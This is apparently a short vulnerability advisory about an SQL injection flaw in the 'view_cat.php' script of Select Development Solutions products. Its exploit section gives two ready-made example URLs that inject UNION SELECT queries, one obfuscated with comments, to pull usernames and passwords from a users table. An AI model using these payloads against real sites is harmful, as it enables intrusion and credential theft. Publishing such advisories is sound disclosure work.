Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Select Development Solutions Multiple Products 'view_cat.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
http://www.example.com/view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--